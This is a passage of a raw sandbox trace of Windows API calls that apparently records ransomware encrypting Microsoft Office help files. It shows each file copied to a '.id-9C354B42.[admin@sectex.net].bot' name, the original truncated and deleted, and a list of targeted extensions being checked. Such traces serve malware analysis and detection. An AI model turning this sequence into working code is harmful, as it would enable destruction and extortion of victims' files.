	[0153.531] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISUTILS.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visutils.vsl")) returned 1
	[0153.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISUTILS.VSL") returned 60
	[0153.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISUTILS.VSL") returned 60
	[0153.559] lstrlenW (lpString=".doc") returned 4
	[0153.559] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0153.559] lstrlenW (lpString=".docx") returned 5
	[0153.559] lstrcmpiW (lpString1=".docx", lpString2="S.VSL") returned -1
	[0153.559] lstrlenW (lpString=".pdf") returned 4
	[0153.559] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0153.559] lstrlenW (lpString=".xls") returned 4
	[0153.559] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0153.559] lstrlenW (lpString=".xlsx") returned 5
	[0153.559] lstrcmpiW (lpString1=".xlsx", lpString2="S.VSL") returned -1
	[0153.559] lstrlenW (lpString=".ppt") returned 4
	[0153.559] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0153.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISUTILS.VSL") returned 60
	[0153.559] lstrlenW (lpString=".zip") returned 4
	[0153.559] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0153.559] lstrlenW (lpString=".rar") returned 4
	[0153.559] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0153.560] lstrlenW (lpString=".bz2") returned 4
	[0153.560] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0153.560] lstrlenW (lpString=".7z") returned 3
	[0153.560] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0153.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISUTILS.VSL") returned 60
	[0153.560] lstrlenW (lpString=".dbf") returned 4
	[0153.560] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0153.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISUTILS.VSL") returned 60
	[0153.560] lstrlenW (lpString=".1cd") returned 4
	[0153.560] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0153.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISUTILS.VSL") returned 60
	[0153.560] lstrlenW (lpString=".jpg") returned 4
	[0153.560] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0153.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISUTILS.VSL") returned 60
	[0153.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISUTILS.VSL") returned 60
	[0153.560] lstrlenW (lpString=".doc") returned 4
	[0153.560] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0153.560] lstrlenW (lpString=".docx") returned 5
	[0153.560] lstrcmpiW (lpString1=".docx", lpString2="S.VSL") returned -1
	[0153.560] lstrlenW (lpString=".pdf") returned 4
	[0153.560] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0153.560] lstrlenW (lpString=".xls") returned 4
	[0153.560] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0153.560] lstrlenW (lpString=".xlsx") returned 5
	[0153.560] lstrcmpiW (lpString1=".xlsx", lpString2="S.VSL") returned -1
	[0153.560] lstrlenW (lpString=".ppt") returned 4
	[0153.560] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0153.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISUTILS.VSL") returned 60
	[0153.560] lstrlenW (lpString=".zip") returned 4
	[0153.560] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0153.560] lstrlenW (lpString=".rar") returned 4
	[0153.561] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0153.561] lstrlenW (lpString=".bz2") returned 4
	[0153.561] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0153.561] lstrlenW (lpString=".7z") returned 3
	[0153.561] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0153.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISUTILS.VSL") returned 60
	[0153.561] lstrlenW (lpString=".dbf") returned 4
	[0153.561] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0153.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISUTILS.VSL") returned 60
	[0153.561] lstrlenW (lpString=".1cd") returned 4
	[0153.561] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0153.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISUTILS.VSL") returned 60
	[0153.561] lstrlenW (lpString=".jpg") returned 4
	[0153.561] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0153.561] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0153.561] lstrlenW (lpString="WINPROJ.DEV_COL.HXT") returned 19
	[0153.561] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0153.631] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=211) returned 1
	[0153.631] CloseHandle (hObject=0x25c) returned 1
	[0153.631] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_col.hxt")) returned 0x20
	[0153.634] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.642] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0153.668] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.668] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.668] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0153.671] GetLastError () returned 0x0
	[0153.671] ReadFile (in: hFile=0x3b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xd3, lpOverlapped=0x0) returned 1
	[0153.672] WriteFile (in: hFile=0x3bc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0153.673] ReadFile (in: hFile=0x3b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.673] WriteFile (in: hFile=0x3bc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0153.673] SetEndOfFile (hFile=0x3bc) returned 1
	[0153.673] CloseHandle (hObject=0x3bc) returned 1
	[0153.673] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.673] SetEndOfFile (hFile=0x3b4) returned 1
	[0153.675] CloseHandle (hObject=0x3b4) returned 1
	[0153.675] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.676] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_col.hxt")) returned 1
	[0153.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXT") returned 67
	[0153.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXT") returned 67
	[0153.677] lstrlenW (lpString=".doc") returned 4
	[0153.677] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0153.677] lstrlenW (lpString=".docx") returned 5
	[0153.677] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0153.677] lstrlenW (lpString=".pdf") returned 4
	[0153.677] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0153.677] lstrlenW (lpString=".xls") returned 4
	[0153.677] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0153.677] lstrlenW (lpString=".xlsx") returned 5
	[0153.677] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0153.677] lstrlenW (lpString=".ppt") returned 4
	[0153.677] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0153.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXT") returned 67
	[0153.677] lstrlenW (lpString=".zip") returned 4
	[0153.677] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0153.677] lstrlenW (lpString=".rar") returned 4
	[0153.677] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0153.677] lstrlenW (lpString=".bz2") returned 4
	[0153.677] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0153.677] lstrlenW (lpString=".7z") returned 3
	[0153.677] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0153.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXT") returned 67
	[0153.677] lstrlenW (lpString=".dbf") returned 4
	[0153.677] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0153.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXT") returned 67
	[0153.677] lstrlenW (lpString=".1cd") returned 4
	[0153.677] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0153.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXT") returned 67
	[0153.677] lstrlenW (lpString=".jpg") returned 4
	[0153.677] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0153.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXT") returned 67
	[0153.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXT") returned 67
	[0153.678] lstrlenW (lpString=".doc") returned 4
	[0153.678] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0153.678] lstrlenW (lpString=".docx") returned 5
	[0153.678] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0153.678] lstrlenW (lpString=".pdf") returned 4
	[0153.678] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0153.678] lstrlenW (lpString=".xls") returned 4
	[0153.678] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0153.678] lstrlenW (lpString=".xlsx") returned 5
	[0153.678] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0153.678] lstrlenW (lpString=".ppt") returned 4
	[0153.678] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0153.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXT") returned 67
	[0153.678] lstrlenW (lpString=".zip") returned 4
	[0153.678] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0153.678] lstrlenW (lpString=".rar") returned 4
	[0153.678] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0153.678] lstrlenW (lpString=".bz2") returned 4
	[0153.678] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0153.678] lstrlenW (lpString=".7z") returned 3
	[0153.678] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0153.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXT") returned 67
	[0153.678] lstrlenW (lpString=".dbf") returned 4
	[0153.678] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0153.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXT") returned 67
	[0153.678] lstrlenW (lpString=".1cd") returned 4
	[0153.678] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0153.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_COL.HXT") returned 67
	[0153.678] lstrlenW (lpString=".jpg") returned 4
	[0153.678] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0153.679] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0153.679] lstrlenW (lpString="WINPROJ_COL.HXC") returned 15
	[0153.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0153.702] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=631) returned 1
	[0153.702] CloseHandle (hObject=0x3dc) returned 1
	[0153.702] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_col.hxc")) returned 0x20
	[0153.702] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0153.702] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.702] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0153.703] GetLastError () returned 0x0
	[0153.703] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x277, lpOverlapped=0x0) returned 1
	[0153.705] WriteFile (in: hFile=0x2a0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x280, lpOverlapped=0x0) returned 1
	[0153.705] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.705] WriteFile (in: hFile=0x2a0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0153.706] SetEndOfFile (hFile=0x2a0) returned 1
	[0153.706] CloseHandle (hObject=0x2a0) returned 1
	[0153.706] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.706] SetEndOfFile (hFile=0x3dc) returned 1
	[0153.708] CloseHandle (hObject=0x3dc) returned 1
	[0153.708] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.708] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_col.hxc")) returned 1
	[0153.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXC") returned 63
	[0153.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXC") returned 63
	[0153.709] lstrlenW (lpString=".doc") returned 4
	[0153.709] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0153.709] lstrlenW (lpString=".docx") returned 5
	[0153.709] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0153.709] lstrlenW (lpString=".pdf") returned 4
	[0153.709] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0153.709] lstrlenW (lpString=".xls") returned 4
	[0153.709] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0153.709] lstrlenW (lpString=".xlsx") returned 5
	[0153.709] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0153.709] lstrlenW (lpString=".ppt") returned 4
	[0153.709] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0153.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXC") returned 63
	[0153.709] lstrlenW (lpString=".zip") returned 4
	[0153.709] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0153.709] lstrlenW (lpString=".rar") returned 4
	[0153.709] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0153.709] lstrlenW (lpString=".bz2") returned 4
	[0153.709] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0153.709] lstrlenW (lpString=".7z") returned 3
	[0153.709] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0153.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXC") returned 63
	[0153.709] lstrlenW (lpString=".dbf") returned 4
	[0153.709] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0153.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXC") returned 63
	[0153.710] lstrlenW (lpString=".1cd") returned 4
	[0153.710] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0153.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXC") returned 63
	[0153.710] lstrlenW (lpString=".jpg") returned 4
	[0153.710] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0153.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXC") returned 63
	[0153.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXC") returned 63
	[0153.710] lstrlenW (lpString=".doc") returned 4
	[0153.710] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0153.710] lstrlenW (lpString=".docx") returned 5
	[0153.710] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0153.710] lstrlenW (lpString=".pdf") returned 4
	[0153.710] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0153.710] lstrlenW (lpString=".xls") returned 4
	[0153.710] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0153.710] lstrlenW (lpString=".xlsx") returned 5
	[0153.710] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0153.710] lstrlenW (lpString=".ppt") returned 4
	[0153.710] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0153.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXC") returned 63
	[0153.710] lstrlenW (lpString=".zip") returned 4
	[0153.710] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0153.710] lstrlenW (lpString=".rar") returned 4
	[0153.710] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0153.710] lstrlenW (lpString=".bz2") returned 4
	[0153.710] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0153.710] lstrlenW (lpString=".7z") returned 3
	[0153.710] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0153.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXC") returned 63
	[0153.710] lstrlenW (lpString=".dbf") returned 4
	[0153.710] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0153.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXC") returned 63
	[0153.711] lstrlenW (lpString=".1cd") returned 4
	[0153.711] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0153.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_COL.HXC") returned 63
	[0153.711] lstrlenW (lpString=".jpg") returned 4
	[0153.711] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0153.711] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0153.711] lstrlenW (lpString="WINPROJ_F_COL.HXK") returned 17
	[0153.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0153.712] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=114) returned 1
	[0153.712] CloseHandle (hObject=0x3dc) returned 1
	[0153.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_f_col.hxk")) returned 0x20
	[0153.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0153.713] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.713] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0153.713] GetLastError () returned 0x0
	[0153.713] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x72, lpOverlapped=0x0) returned 1
	[0153.714] WriteFile (in: hFile=0x2a0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x80, lpOverlapped=0x0) returned 1
	[0153.715] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.715] WriteFile (in: hFile=0x2a0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0153.715] SetEndOfFile (hFile=0x2a0) returned 1
	[0153.715] CloseHandle (hObject=0x2a0) returned 1
	[0153.715] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.715] SetEndOfFile (hFile=0x3dc) returned 1
	[0153.718] CloseHandle (hObject=0x3dc) returned 1
	[0153.718] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.718] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj_f_col.hxk")) returned 1
	[0153.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ_F_COL.HXK") returned 65
